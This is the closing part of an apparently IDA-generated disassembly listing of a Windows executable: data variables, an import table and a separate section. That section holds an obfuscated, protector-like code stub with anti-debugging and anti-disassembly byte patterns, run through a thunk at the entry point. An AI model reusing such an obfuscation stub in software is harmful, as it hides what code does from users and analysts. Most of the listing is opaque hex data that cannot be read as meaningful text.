word_4923D6 dw 0 ; DATA XREF: sub_42BEA0+82�r
; sub_42BEA0+D2�r
word_4923D8 dw 0 ; DATA XREF: sub_42BEA0+6D�r
; sub_42BEA0+C8�r
word_4923DA dw 0 ; DATA XREF: sub_42BEA0+63�r
; sub_42BEA0+BE�r
word_4923DC dw 0 ; DATA XREF: sub_42BEA0+5A�r
; sub_42BEA0+B5�r
word_4923DE dw 0 ; DATA XREF: sub_42BEA0+50�r
; sub_42BEA0+AB�r
dword_4923E0 dd 0 ; DATA XREF: sub_42BAC0+B6�r
; sub_42BAC0+C9�r
dword_4923E4 dd 0 ; DATA XREF: sub_42BAC0+18D�r
; sub_42BAC0+196�r ...
dword_4923E8 dd 0 ; DATA XREF: sub_42BA60+3�r
; sub_42BA60+16�r ...
dword_4923EC dd 0 ; DATA XREF: sub_4282A0:loc_4282FC�r
byte_4923F0 db 0 ; DATA XREF: sub_42F050+18F�o
; sub_42F050+1F2�r ...
align 8
dword_4923F8 dd 0 ; DATA XREF: sub_42A7F0+11�o
; .data:off_4440A4�o ...
dword_4923FC dd 0 ; DATA XREF: sub_42F2F0+26�r
; sub_42F2F0+46�w ...
dword_492400 dd 0 ; DATA XREF: sub_42FEA0+26�r
; sub_42FEA0+41�w ...
dword_492404 dd 0 ; DATA XREF: sub_430040+26�r
; sub_430040+41�w ...
dword_492408 dd 0 ; DATA XREF: sub_4302F0+26�r
; sub_4302F0+4B�w ...
dword_49240C dd 0 ; DATA XREF: sub_431390+26�r
; sub_431390+4B�w ...
dword_492410 dd 0 ; DATA XREF: sub_42E1D0+8F�w
; sub_42E1D0+A4�w ...
dword_492414 dd 0 ; DATA XREF: sub_42E360+1C4�w
; sub_42E360+1ED�w ...
align 10h
dword_492420 dd 9461C8h ; DATA XREF: sub_41E810+1EB�r
; sub_4210E0+ED�r ...
dd 3Fh dup(0)
dword_492520 dd 20h ; DATA XREF: sub_421310+7�r
; sub_421E90+7�r ...
dword_492524 dd 4E4h ; DATA XREF: sub_4241C0+22�r
; sub_4241C0+14A�w ...
align 10h
word_492530 dw 0 ; DATA XREF: sub_4241C0+19A�w
; sub_4241C0+2F3�w ...
align 4
dd 2 dup(0)
dword_49253C dd 0 ; DATA XREF: sub_4241C0+150�w
; sub_4241C0+2C2�w ...
byte_492540 db 0 ; DATA XREF: sub_424670+1CE�w
; sub_424670+21A�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_492640 db 0 ; DATA XREF: sub_4241C0+AB�w
; sub_4241C0+1F4�w ...
byte_492641 db 0 ; DATA XREF: sub_41B4D0+92�r
; sub_4241C0+129�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_492744 dd 0 ; DATA XREF: sub_4241C0+169�w
; sub_4241C0+205�w ...
dword_492748 dd 0 ; DATA XREF: sub_41A5E0+68�r
; sub_41AE40+32�r ...
dword_49274C dd 0 ; DATA XREF: sub_41A5E0:loc_41A63D�o
; sub_41A5E0+71�o ...
dword_492750 dd 946680h ; DATA XREF: sub_4210E0+48�w
; sub_4210E0+4D�r ...
align 10h
dword_492760 dd 400h dup(0) ; DATA XREF: .data:off_442F80�o
; .data:00442F88�o
dword_493760 dd 200h ; DATA XREF: sub_4210E0+4�r
; sub_4210E0+D�w ...
dword_493764 dd 10h ; DATA XREF: sub_41CAE0+48�w
; sub_41D710+9�r ...
dword_493768 dd 0 ; DATA XREF: sub_41CC00+475�r
; sub_41CC00+4A4�r ...
dword_49376C dd 941E90h ; DATA XREF: sub_41CAE0+2E�w
; sub_41CC00+5B2�w ...
dword_493770 dd 0 ; DATA XREF: sub_41CAE0+34�w
; sub_41CC00+468�r ...
dword_493774 dd 1 ; DATA XREF: .text:0041CA33�r
; sub_41CAE0+3E�w ...
dword_493778 dd 941E90h ; DATA XREF: .text:0041CA16�r
; .text:loc_41CA86�r ...
dword_49377C dd 940000h ; DATA XREF: sub_418030+76�r
; sub_41BDF0+5C�r ...
dword_493780 dd 0 ; DATA XREF: .text:0041BF64�r
; .text:0041BF6F�w ...
dword_493784 dd 142340h ; DATA XREF: sub_41B970+B9�w
; sub_425180:loc_425192�r ...
dword_493788 dd 1 ; DATA XREF: sub_425240+13B�w
; sub_42F770+E�r
dword_49378C dd 1 ; DATA XREF: sub_4249A0+3�r
; sub_4249A0+16�w ...
dword_493790 dd 0 ; DATA XREF: sub_41B390+45�r
dword_493794 dd 0 ; DATA XREF: sub_41B390+3C�r
; sub_41B390+5A�r
dword_493798 dd 0 ; DATA XREF: .text:004181B4�r
; .text:004181BF�w ...
align 1000h
_data ends
; Section 4. (virtual address 00094000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00094000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 494000h
dd 9424Ch, 3 dup(0)
dd 944A0h, 9403Ch, 3 dup(0)
dd 94290h, 5 dup(0)
dd 9490Ch, 94E30h, 94E1Eh, 94E0Ch, 94DFAh, 94DEAh, 94DD4h
dd 94DBEh, 94DACh, 94D9Ch, 94D88h, 94D78h, 94D66h, 94D54h
dd 94D48h, 94D3Ah, 94D28h, 944F0h, 94506h, 9450Eh, 9451Ah
dd 94528h, 94534h, 94548h, 94556h, 94566h, 94576h, 9458Ch
dd 9459Ah, 945B2h, 945CAh, 945DAh, 94602h, 9461Ah, 9462Ah
dd 9463Ch, 9464Ah, 94660h, 9467Ah, 94696h, 946A4h, 946B6h
dd 946C2h, 946D2h, 946E4h, 946F2h, 9470Ch, 9471Eh, 9472Eh
dd 9473Ah, 94746h, 94758h, 94770h, 9478Ah, 9479Ch, 947B0h
dd 947C0h, 947CEh, 947E0h, 947F2h, 94808h, 9481Ch, 9482Eh
dd 9483Eh, 9484Ch, 9485Eh, 9486Eh, 94884h, 94892h, 948A0h
dd 948BCh, 948D2h, 948E2h, 948F8h, 94920h, 94934h, 94940h
dd 9494Eh, 94964h, 94970h, 94986h, 94996h, 949A8h, 949B4h
dd 949CAh, 949DAh, 949ECh, 949FAh, 94A12h, 94A24h, 94A34h
dd 94A48h, 94A62h, 94A7Eh, 94A94h, 94AA4h, 94AB4h, 94AC4h
dd 94ADCh, 94AF4h, 94B0Eh, 94B1Eh, 94B30h, 94B42h, 94B50h
dd 94B6Ch, 94B7Ch, 94B8Ah, 94B9Ah, 94BB0h, 94BBEh, 94BCCh
dd 94BDAh, 94BE8h, 94BF8h, 94C0Eh, 94C1Ch, 94C28h, 94C32h
dd 94C42h, 94C50h, 94C64h, 94C74h, 94C84h, 94C90h, 94C9Ah
dd 94CA6h, 94CC2h, 94CDCh, 94CF6h, 94D0Eh, 0
dd 10h dup(80000000h), 0
dword_494290 dd 930000h ; DATA XREF: sub_40B487+C�r
; sub_412E64+79�r ...
dword_494294 dd 930010h ; DATA XREF: sub_430740+2C5�r
; .text:00430FEC�r
dword_494298 dd 930020h ; DATA XREF: sub_4302F0+41�r
; sub_4302F0+3DA�r ...
dword_49429C dd 93003Dh ; DATA XREF: sub_4302F0+69�r
; sub_4302F0+D9�r ...
dword_4942A0 dd 930058h ; DATA XREF: sub_42FEA0+37�r
; sub_42FEA0+8B�r ...
dword_4942A4 dd 930068h ; DATA XREF: sub_42C610+1D8�r
; .text:00430FD4�r
dword_4942A8 dd 930077h ; DATA XREF: sub_42B5E0+12�r
; .text:00430FCE�r
dword_4942AC dd 930086h ; DATA XREF: sub_42AF50+7A�r
; sub_42B340+53�r ...
dword_4942B0 dd 9300ABh ; DATA XREF: sub_42ACC0+142�r
; .text:00430FC2�r
dword_4942B4 dd 9300C9h ; DATA XREF: sub_42ACC0+15C�r
; .text:00430FBC�r
dword_4942B8 dd 9300D8h ; DATA XREF: sub_428180+7F�r
; .text:00430FB6�r
dword_4942BC dd 9300F6h ; DATA XREF: sub_427DA0+58�r
; sub_427DA0+66�r ...
dword_4942C0 dd 930106h ; DATA XREF: sub_426F40+3C�r
; sub_426F40+19E�r ...
dword_4942C4 dd 930117h ; DATA XREF: sub_426F40+61�r
; sub_426F40+AA�r ...
dword_4942C8 dd 930125h ; DATA XREF: sub_430F9E�r
dword_4942CC dd 930133h ; DATA XREF: sub_425AC0+1E6�r
; sub_425AC0+29B�r ...
dword_4942D0 dd 930144h ; DATA XREF: sub_425AC0+31A�r
; .text:00430F92�r
dword_4942D4 dd 930154h ; DATA XREF: sub_401000+66�r
; sub_4010E6+65�r ...
dword_4942D8 dd 930164h ; DATA XREF: sub_4010E6+A9�r
; sub_4013F1+2C2�r ...
dword_4942DC dd 930181h ; DATA XREF: sub_4013F1+135�r
; sub_40465D+271�r ...
dword_4942E0 dd 93019Ch ; DATA XREF: sub_4013F1+120�r
; sub_4013F1+150�r ...
dword_4942E4 dd 9301ACh ; DATA XREF: sub_4013F1+103�r
; sub_403948+1B0�r ...
dword_4942E8 dd 9301BBh ; DATA XREF: sub_4013F1+E9�r
; .text:00430CFE�r
dword_4942EC dd 9301CAh ; DATA XREF: sub_4013F1+68�r
; sub_403948+196�r ...
dword_4942F0 dd 9301EFh ; DATA XREF: sub_402994:loc_402AD0�r
; sub_402994:loc_402BF4�r ...
dword_4942F4 dd 93020Dh ; DATA XREF: sub_402994+10E�r
; sub_402994+22D�r ...
dword_4942F8 dd 93021Ch ; DATA XREF: sub_402994+58�r
; sub_402994+177�r ...
dword_4942FC dd 93023Ah ; DATA XREF: sub_403076+20E�r
; sub_40328A+23F�r ...
dword_494300 dd 93024Ah ; DATA XREF: sub_403076+13F�r
; sub_41BD30+E�r ...
dword_494304 dd 93025Bh ; DATA XREF: sub_403076+D4�r
; sub_41BC90+8D�r ...
dword_494308 dd 930269h ; DATA XREF: sub_403076+32�r
; sub_404C3D+27�r ...
dword_49430C dd 930277h ; DATA XREF: sub_40328A+77�r
; .text:00430D34�r
dword_494310 dd 930288h ; DATA XREF: sub_40328A+6B�r
; sub_40328A+22F�r ...
dword_494314 dd 930298h ; DATA XREF: sub_4035E1+D�r
; sub_4084C8+E�r ...
dword_494318 dd 9302A8h ; DATA XREF: sub_40465D+259�r
; sub_407C49+6C�r ...
dword_49431C dd 9302C5h ; DATA XREF: sub_40465D+133�r
; sub_407317+1EE�r ...
dword_494320 dd 9302E0h ; DATA XREF: sub_404A02+3A�r
; sub_405938+74�r ...
dword_494324 dd 9302F0h ; DATA XREF: sub_404CEF+18C�r
; sub_404CEF+2D4�r ...
dword_494328 dd 9302FFh ; DATA XREF: sub_404CEF+182�r
; sub_414F67+FF�r ...
dword_49432C dd 93030Eh ; DATA XREF: sub_405084+478�r
; sub_405938+DF�r ...
dword_494330 dd 930333h ; DATA XREF: sub_405084+462�r
; sub_405938+A7�r ...
dword_494334 dd 930351h ; DATA XREF: sub_405B38+BA�r
; sub_4075C7+5E8�r ...
dword_494338 dd 930360h ; DATA XREF: sub_405B38+AF�r
; sub_405B38+139�r ...
dword_49433C dd 93037Eh ; DATA XREF: sub_405B38+26�r
; sub_4075C7+1FC�r ...
dword_494340 dd 93038Eh ; DATA XREF: sub_405C86+170�r
; .text:00430D82�r
dword_494344 dd 93039Fh ; DATA XREF: sub_405C86+BC�r
; .text:00430D88�r
dword_494348 dd 9303ADh ; DATA XREF: sub_405C86+60�r
; sub_40888A+11�r ...
dword_49434C dd 9303BBh ; DATA XREF: sub_405C86+5A�r
; sub_40888A+13A�r ...
dword_494350 dd 9303CCh ; DATA XREF: sub_405E58+41�r
; sub_405E58+F5�r ...
dword_494354 dd 9303DCh ; DATA XREF: sub_405E58+21�r
; sub_405FE1+4A�r ...
dword_494358 dd 9303ECh ; DATA XREF: sub_405E58+10�r
; sub_405FE1+40�r ...
dword_49435C dd 930409h ; DATA XREF: sub_405FE1+135�r
; sub_4075C7+27B�r ...
dword_494360 dd 930424h ; DATA XREF: sub_405FE1+123�r
; sub_4075C7+26D�r ...
dword_494364 dd 930434h ; DATA XREF: sub_405FE1+88�r
; sub_406188+55�r ...
dword_494368 dd 930443h ; DATA XREF: sub_405FE1+56�r
; sub_406188+97�r ...
dword_49436C dd 930452h ; DATA XREF: sub_405FE1+34�r
; sub_406188+2E�r ...
dword_494370 dd 930477h ; DATA XREF: sub_405FE1+15�r
; sub_406188+13�r ...
dword_494374 dd 930495h ; DATA XREF: sub_407195+9F�r
; sub_415430+1B6�r ...
dword_494378 dd 9304A4h ; DATA XREF: sub_407195+8B�r
; sub_415430+19F�r ...
dword_49437C dd 9304C2h ; DATA XREF: sub_407317+110�r
; sub_409D2E+10F�r ...
dword_494380 dd 9304D2h ; DATA XREF: sub_40888A+2�r
; sub_409D2E+FB�r ...
dword_494384 dd 9304E3h ; DATA XREF: sub_409AA0+2D�r
; .text:00430DE8�r
dword_494388 dd 9304F1h ; DATA XREF: sub_409B2A+26�r
; .text:00430DEE�r
dword_49438C dd 9304FFh ; DATA XREF: sub_409B2A+1D�r
; .text:00430DF4�r
dword_494390 dd 930510h ; DATA XREF: sub_409B65+6C�r
; .text:00430DFA�r
dword_494394 dd 930520h ; DATA XREF: sub_409B65+39�r
; .text:00430E00�r
dword_494398 dd 930530h ; DATA XREF: sub_409B65+28�r
; .text:00430E06�r
dword_49439C dd 93054Dh ; DATA XREF: sub_409BEA+96�r
; .text:00430E0C�r
dword_4943A0 dd 930568h ; DATA XREF: sub_409BEA+60�r
; .text:00430E12�r
dword_4943A4 dd 930578h ; DATA XREF: sub_409D2E+15D�r
; .text:00430E18�r
dword_4943A8 dd 930587h ; DATA XREF: sub_409D2E+126�r
; sub_40BBCB+1B5�r ...
dword_4943AC dd 930596h ; DATA XREF: sub_409D2E+35�r
; sub_40C50A+3E60�r ...
dword_4943B0 dd 9305BBh ; DATA XREF: sub_40A359+13�r
; sub_422F40+2A5�r ...
dword_4943B4 dd 9305D9h ; DATA XREF: sub_40AD78+34�r
; .text:00413603�r ...
dword_4943B8 dd 9305E8h ; DATA XREF: sub_40B4F2+113�r
; sub_40B4F2+22F�r ...
dword_4943BC dd 930606h ; DATA XREF: sub_40B4F2+DE�r
; .text:00430E42�r
dword_4943C0 dd 930616h ; DATA XREF: sub_40BBCB+33B�r
; sub_40C50A+4AD5�r ...
dword_4943C4 dd 930627h ; DATA XREF: sub_40BBCB+267�r
; .text:00430E4E�r
dword_4943C8 dd 930635h ; DATA XREF: sub_40BBCB:loc_40BD86�r
; .text:00430E54�r
dword_4943CC dd 930643h ; DATA XREF: sub_40BBCB+6B�r
; sub_40BBCB+311�r ...
dword_4943D0 dd 930654h ; DATA XREF: sub_40BBCB+64�r
; .text:00430E60�r
dword_4943D4 dd 930664h ; DATA XREF: sub_40C50A+4D5D�r
; sub_41416C+9F�r ...
dword_4943D8 dd 930674h ; DATA XREF: sub_40C50A+3C5C�r
; .text:00430E6C�r
dword_4943DC dd 930691h ; DATA XREF: sub_412D0F+5A�r
; .text:00430E72�r
dword_4943E0 dd 9306ACh ; DATA XREF: sub_412D0F+3D�r
; .text:00430E78�r
dword_4943E4 dd 9306BCh ; DATA XREF: sub_412E64+91�r
; sub_4143B6+77�r ...
dword_4943E8 dd 9306CBh ; DATA XREF: sub_412E64+37�r
; sub_4142BD+23�r ...
dword_4943EC dd 9306DAh ; DATA XREF: sub_4132AA+5F�r
; .text:0042660A�r ...
dword_4943F0 dd 9306FFh ; DATA XREF: .text:004136A5�r
; sub_42ACC0+18�r ...
dword_4943F4 dd 93071Dh ; DATA XREF: .text:00413719�r
; sub_4152DC+1D�r ...
dword_4943F8 dd 93072Ch ; DATA XREF: sub_413E55+1EA�r
; .text:00430E9C�r
dword_4943FC dd 93074Ah ; DATA XREF: sub_41416C+C7�r
; .text:00430EA2�r
dword_494400 dd 93075Ah ; DATA XREF: sub_414541+5E�r
; .text:00430EA8�r
dword_494404 dd 93076Bh ; DATA XREF: sub_415430+1CF�r
; .text:00430EAE�r
dword_494408 dd 930779h ; DATA XREF: sub_417FE0+2A�r
; sub_41E130+19�r ...
dword_49440C dd 930787h ; DATA XREF: sub_417FE0+12�r
; .text:00430EBA�r
dword_494410 dd 930798h ; DATA XREF: sub_418030+7C�r
; sub_41C930+39�r ...
dword_494414 dd 9307A8h ; DATA XREF: sub_41A5E0+76�r
; sub_41A5E0+B6�r ...
dword_494418 dd 9307B8h ; DATA XREF: sub_41A5E0+62�r
; sub_41AE40+2C�r ...
dword_49441C dd 9307D5h ; DATA XREF: sub_41ABD0+9F�r
; sub_42BAC0+5E�r ...
dword_494420 dd 9307F0h ; DATA XREF: sub_41ABD0+17�r
; .text:00430ED8�r
dword_494424 dd 930800h ; DATA XREF: sub_41B970+E2�r
; sub_425AC0+87�r ...
dword_494428 dd 93080Fh ; DATA XREF: sub_41B970+B3�r
; .text:00430EE4�r
dword_49442C dd 93081Eh ; DATA XREF: sub_41B970+26�r
; .text:00430EEA�r
dword_494430 dd 930843h ; DATA XREF: sub_41BBB0+9�r
; sub_41BBB0+16�r ...
dword_494434 dd 930861h ; DATA XREF: .text:0041BD59�r
; .text:00430EF6�r
dword_494438 dd 930870h ; DATA XREF: sub_41BE70+3�r
; .text:00430EFC�r
dword_49443C dd 93088Eh ; DATA XREF: .text:0041BF1E�r
; .text:0041BF38�r ...
dword_494440 dd 93089Eh ; DATA XREF: sub_41BF80+102�r
; sub_41BF80+2F3�r ...
dword_494444 dd 9308AFh ; DATA XREF: sub_41C620+A3�r
; sub_41C6D0+1B0�r ...
dword_494448 dd 9308BDh ; DATA XREF: sub_41C9C0+3C�r
; .text:0041CAA2�r ...
dword_49444C dd 9308CBh ; DATA XREF: sub_41C9C0+14�r
; .text:00430F1A�r
dword_494450 dd 9308DCh ; DATA XREF: .text:0041CA4C�r
; .text:0041CA60�r ...
dword_494454 dd 9308ECh ; DATA XREF: sub_41D710+A3�r
; sub_41D820+A7�r ...
dword_494458 dd 9308FCh ; DATA XREF: sub_41F930+64�r
; sub_41FA10+66�r ...
dword_49445C dd 930919h ; DATA XREF: sub_41F930+4A�r
; sub_41FA10+50�r ...
dword_494460 dd 930934h ; DATA XREF: sub_41F930+9�r
; .text:00430F38�r
dword_494464 dd 930944h ; DATA XREF: .text:0041F9D7�r
; .text:00430F3E�r
dword_494468 dd 930953h ; DATA XREF: sub_41FA10+8B�r
; .text:00430F44�r
dword_49446C dd 930962h ; DATA XREF: sub_41FA10+15�r
; .text:0041FACC�r ...
dword_494470 dd 930987h ; DATA XREF: .text:0041FBD3�r
; .text:00430F50�r
dword_494474 dd 9309A5h ; DATA XREF: sub_422F40+69�r
; sub_422F40+C0�r ...
dword_494478 dd 9309B4h ; DATA XREF: sub_422F40+41�r
; sub_422F40+1A5�r ...
dword_49447C dd 9309D2h ; DATA XREF: sub_4241C0+1C7�r
; sub_424670+17�r ...
dword_494480 dd 9309E2h ; DATA XREF: sub_424510+35�r
; .text:00430F68�r
dword_494484 dd 9309F3h ; DATA XREF: sub_424510+1D�r
; .text:00430F6E�r
dword_494488 dd 930A01h ; DATA XREF: sub_424F60+37�r
; .text:00430F74�r
dword_49448C dd 930A0Fh ; DATA XREF: sub_4258A0+1E6�r
; sub_4258A0+208�r ...
dword_494490 dd 930A20h ; DATA XREF: sub_4258A0+108�r
; sub_4258A0+150�r ...
dword_494494 dd 930A30h ; DATA XREF: sub_4258A0:loc_4258D8�r
; sub_4258A0+171�r ...
dword_494498 dd 930A40h ; DATA XREF: sub_4258A0+1D�r
; sub_4258A0+6D�r ...
dd 930A5Dh
dword_4944A0 dd 71AB12F8h ; DATA XREF: sub_406C1D+35�r
; .text:00430CDA�r
dword_4944A4 dd 71AB3E5Dh ; DATA XREF: sub_406C1D+57�r
; .text:00430CD4�r
dword_4944A8 dd 71AB1836h ; DATA XREF: sub_406C1D+6E�r
; sub_406C9A+8E�r ...
dword_4944AC dd 71AB41DAh ; DATA XREF: sub_406614+47�r
; sub_406C1D+15�r ...
dword_4944B0 dd 71AB3C22h ; DATA XREF: sub_406614+78�r
; sub_406C1D+21�r ...
dword_4944B4 dd 71AB3F8Dh ; DATA XREF: sub_406614+91�r
; .text:00430CBC�r
dword_4944B8 dd 71AB155Ah ; DATA XREF: sub_406614+A1�r
; .text:00430CB6�r
dword_4944BC dd 71AB1746h ; DATA XREF: sub_406614+B7�r
; sub_406C1D+41�r ...
dword_4944C0 dd 71AB3ECEh ; DATA XREF: sub_406614+C8�r
; .text:00430CAA�r
dword_4944C4 dd 71AB5DE2h ; DATA XREF: sub_406614+DC�r
; .text:00430CA4�r
dword_4944C8 dd 71AB1AF4h ; DATA XREF: sub_406614+E8�r
; sub_406C9A+66�r ...
dword_4944CC dd 71AB1890h ; DATA XREF: sub_406614+119�r
; .text:00430C98�r
dword_4944D0 dd 71AB1B7Bh ; DATA XREF: sub_430C92�r
dword_4944D4 dd 71AB868Dh ; DATA XREF: sub_406614+186�r
; .text:00430C8C�r
dword_4944D8 dd 71AB5690h ; DATA XREF: sub_406614+1FE�r
; .text:00430C86�r
dword_4944DC dd 71AB1A6Dh ; DATA XREF: sub_406614+24F�r
; sub_406C1D+68�r ...
align 1000h
_idata ends
; Section 5. (virtual address 00095000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00095000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
seg004 segment para public 'DATA' use32
assume cs:seg004
;org 495000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame thunk
sub_495000 proc near ; CODE XREF: start�j
jmp sub_41B970
sub_495000 endp
; ---------------------------------------------------------------------------
align 4
dd 8Eh dup(0)
db 3 dup(0)
byte_495243 db 0 ; DATA XREF: .data:004439D0�o
dd 550h dup(0)
dd 0FABD0000h, 0B90040CDh, 2Ch, 0AB66AAF3h, 20CD02EBh
dd 2464FF61h, 89D0h, 0
dd 0C0172F9h, 6040C133h, 6E8h, 24648B00h, 330DEB08h, 31FF64C9h
dd 0F1218964h, 0E8EBF1F7h, 20CD02EBh, 0E8C6F883h, 6, 6E940h
dd 0C8C10000h, 0C003C358h, 0BFC713h, 64000000h, 0EB5F078Fh
dd 0D883B801h, 6E8606Fh, 8B000000h, 0EB082464h, 0FF67641Ah
dd 64000036h, 268967h, 0C819C00h, 10024h, 73F89D00h, 6420CDDCh
dd 68F67h, 0F9615800h, 20CD0272h, 0E87872F8h, 0
dd 0C0172F9h, 76A5D33Dh, 241C8B13h, 97EB8158h, 0EB004114h
dd 0E8F56601h, 0Bh, 0E998C233h, 0Eh, 255172F8h, 0DCEFF0BCh
dd 66FF0DC3h, 9C2D1CD4h, 0BE35A078h, 0
dd 9FE2F681h, 0C68105ECh, 0FA5473B7h, 20FF02EBh, 0E805E883h
dd 0Ch, 9E9C313h, 0D000000h, 2992B790h, 0C31DD0C1h, 0F303C613h
dd 0F281D233h, 0D735CDE9h, 3234C281h, 72F928CAh, 0E8400C01h
dd 8, 8E9F8h, 0C6230000h, 0C3C22390h, 50BFC413h, 0F9722666h
dd 20CD0272h, 3119FF6Bh, 3C7C13Eh, 7D783F8h, 6A05C78Bh
dd 977B0DDFh, 0F0273F8h, 4DB89888h, 2B0440F8h, 4CC281D0h
dd 0F80440F8h, 210F0273h, 81C31BF9h, 4C6h, 0FF02EB00h
dd 73F89020h, 0C1880F02h, 0C0334FD8h, 79C20348h, 7001EBB7h
dd 0E8FCC223h, 9, 7E9FCh, 8B480000h, 0D883C3C4h, 21D0C1ABh
dd 6601EB61h, 1EA1050Dh, 372FC30Ch, 0E6F7ADD6h, 0AFC97D57h
dd 14326E75h, 9EBF26E2h, 0E2787083h, 32622CB9h, 1443D8D6h
dd 9FD9F8AAh, 0E774881h, 0A0CAF622h, 9178B309h, 0F954E5D1h
dd 9989BFh, 594DF7C5h, 0FB7E84D5h, 65285F15h, 0A1B21D29h
dd 3D7F794Fh, 2BF9D675h, 0F57AB107h, 0AB330402h, 7F2B2BB9h
dd 9E0E2B5Fh, 0BE294755h, 2EB0407h, 41E820CDh, 5B000000h
dd 0E8h, 0Ah dup(0)
dd 0FFAB6600h, 0C1EA66E3h, 928C9E8h, 9DDD1B0Bh, 0CC2E1082h
dd 0EBFF03EBh, 0C01BFCFFh, 6E860h, 648B0000h, 0DEB0824h
dd 0FF64DB33h, 23896433h, 0EB03FFF1h, 75E40BE8h, 230DEB01h
dd 2B065267h, 68F64F6h, 0FF02EB5Eh, 6E86020h, 8B000000h
dd 0EB082464h, 0FF67641Ah, 64000036h, 268967h, 0C819C00h
dd 10024h, 73F89D00h, 6420CDDCh, 68F67h, 0B615800h, 0EB0175E4h
dd 5B145E05h, 0E812h, 2EB0000h, 348B20FFh, 0EE815824h
dd 411449h, 379E485h, 3D42910Fh, 356623D9h, 14E908B8h
dd 81F88B9Eh, 0D3D572EFh, 0B801EB9Dh, 0ACB8FE03h, 8B337649h
dd 9FEB81D8h, 0EB337649h, 1B486601h, 2376BAC1h, 2EB3F1Dh
dd 0C50320FFh, 8E8h, 1DD08300h, 7E9h, 40C51300h, 90C883C3h
dd 310FD26Bh, 3C2C117h, 3FD283F9h, 4C781h, 2EB0000h, 0D0C120FFh
dd 75E40B81h, 0F083EB01h, 1EB83DEh, 906601EBh, 0B932C281h
dd 73F842F1h, 0B8210F02h, 2DC3D36h, 0E3CB8B51h, 0C0EB5903h
dd 272F959h, 0C0C120CDh, 2EB619Ch, 134020FFh, 4D10C3C0h
dd 79A015E2h, 0C2072DD1h, 0CB75C9B0h, 0D324027Dh, 21880565h
dd 5D2172Dh, 0F2CD4C10h, 4AD471E5h, 0A00A8362h, 59FC90C8h
dd 0D992C9EFh, 71505310h, 4270B850h, 0DD369D76h, 0D1386F20h
dd 0A5DC62B6h, 499F8256h, 727E1D25h, 66F0DEE9h, 7C5C8961h
dd 523AB54h, 102C2C82h, 3971F821h, 18A48BC7h, 0D112E2A8h
dd 879B1DE2h, 5ACBF0ECh, 5A81A8Eh, 1E864817h, 23C36C0Bh
dd 0B6E016B8h, 0C8B28DA7h, 0B8F32348h, 74227698h, 5D30CFB6h
dd 57DAA74Bh, 0B311165Ah, 0BF15E83Ah, 0E911DB4h, 5BDAD306h
dd 0B2562184h, 0BF2B21F2h, 74AFB354h, 48941F98h, 839C6049h
dd 6CEE4A2h, 646E0B3Ch, 0F6636C39h, 7032295h, 0E8h, 242C8100h
dd 237h, 42464FFh
db 0, 0F9h
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 500E0000h, 9B40h, 0E7h dup(0)
dd 9090000h, 0A0808h, 41Eh dup(0)
seg004 ends
; Section 6. (virtual address 00098000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00098000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 498000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start